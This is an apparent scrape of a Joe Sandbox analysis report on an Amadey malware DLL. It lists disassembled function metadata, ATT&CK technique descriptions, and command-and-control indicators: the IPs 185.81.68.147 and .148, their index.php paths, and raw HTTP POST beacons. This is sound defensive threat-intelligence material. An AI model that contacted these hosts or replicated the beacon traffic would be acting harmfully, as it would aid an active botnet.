Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 10f1a9c9dc91123816715c89232a3b7b668dc4bdcab73924e6258bf4b1fde1b0
Instruction ID: 625e79b35d5e9fe83e404382920c05e8e31279f72f67ac24a9835d5aac8f3587
Opcode Fuzzy Hash: 10f1a9c9dc91123816715c89232a3b7b668dc4bdcab73924e6258bf4b1fde1b0
Instruction Fuzzy Hash: E2F0C736510A15BBCF525FD5CD0598E3F75FB85365B044511FE19D5220EB318830EB95

Function 6EC4AC4F Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EC4AC58

Part of subcall function 6EC4B90F: HeapFree.KERNEL32(00000000,00000000,?,6EC4AB0E), ref: 6EC4B925
Part of subcall function 6EC4B90F: GetLastError.KERNEL32(?,?,6EC4AB0E), ref: 6EC4B937

_free.LIBCMT ref: 6EC4AC6B
_free.LIBCMT ref: 6EC4AC7C
_free.LIBCMT ref: 6EC4AC8D

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 92f2a4057c892b4274675eebc6487f9ed4b5deadcf4be5664af5c1f632d9ff7f
Instruction ID: 091889ed02c57fe062f06f92788da8c62d5fec472f6afa31a50e972e1a8b72b3
Opcode Fuzzy Hash: 92f2a4057c892b4274675eebc6487f9ed4b5deadcf4be5664af5c1f632d9ff7f
Instruction Fuzzy Hash: 1EE04671810DA9EE8E4A2F508B004CA3B39EB57A243298416E80872218D7320A72DF8A

Function 6EC4A367 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6EC4A3AA, 6EC4A3B1, 6EC4A3E7

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 74f926bafbd6e57f889939d66d0a6d3c19f7971dc5a9f5e9d8553d4ac2d32b6a
Instruction ID: 1ca1fed6efb5b1ac6855177fe3ec2f2c646a4c8467c6ff1b452b9ae611082cba
Opcode Fuzzy Hash: 74f926bafbd6e57f889939d66d0a6d3c19f7971dc5a9f5e9d8553d4ac2d32b6a
Instruction Fuzzy Hash: F9419C70A00659EFDB168FE98D849DEBBBCEBC5310F20547AE814A7250F7708A50CB95

Function 6EC4866A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6EC4868F

Strings

MOC, xrefs: 6EC486A1
RCC, xrefs: 6EC486A9

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: e08002c4bf493a526f9b1124e693bfe04b74bfd5b5db5eb33503c5f3dacab1e0
Instruction ID: 9a1110f8b6b9b6c4b96aff06e74c97ab4607c49968ece2a8d4130c536db907fc
Opcode Fuzzy Hash: e08002c4bf493a526f9b1124e693bfe04b74bfd5b5db5eb33503c5f3dacab1e0
Instruction Fuzzy Hash: F5415672900209EFDF41CFD4CC91EEEBBB5BF48304F148459FA14A6254E3359A50DBA0

Source: http://185.81.68.148/2	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpm	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpmUtcs	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/R	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpR	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpH	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpF	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.php	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpJ	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php.	Avira URL Cloud: Label: phishing

Source: Network traffic	Suricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.10:49733 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.10:49726 -> 185.81.68.148:80

Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1

Source: Joe Sandbox View	ASN Name: KLNOPT-ASFI KLNOPT-ASFI
Source: Joe Sandbox View	ASN Name: KLNOPT-ASFI KLNOPT-ASFI

Source: D72j5I83wU.dll	Virustotal: Detection: 65%			Perma Link
Source: D72j5I83wU.dll	ReversingLabs: Detection: 47%

Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report D72j5I83wU.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Initial Sample

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
D72j5I83wU.dll

Function 6EC41EC0 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 409
networkfileCOMMON

Function 6EC431B0 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 477
COMMON

Function 6EC41ED0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 386
networkfileCOMMON

Function 6EC46E7A Relevance: 10.6, APIs: 7, Instructions: 138
COMMONLIBRARYCODE

Function 6EC46F2C Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6EC4B423 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Function 6EC46D73 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6EC4B8B2 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 6EC4DDF0 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Function 6EC482C0 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE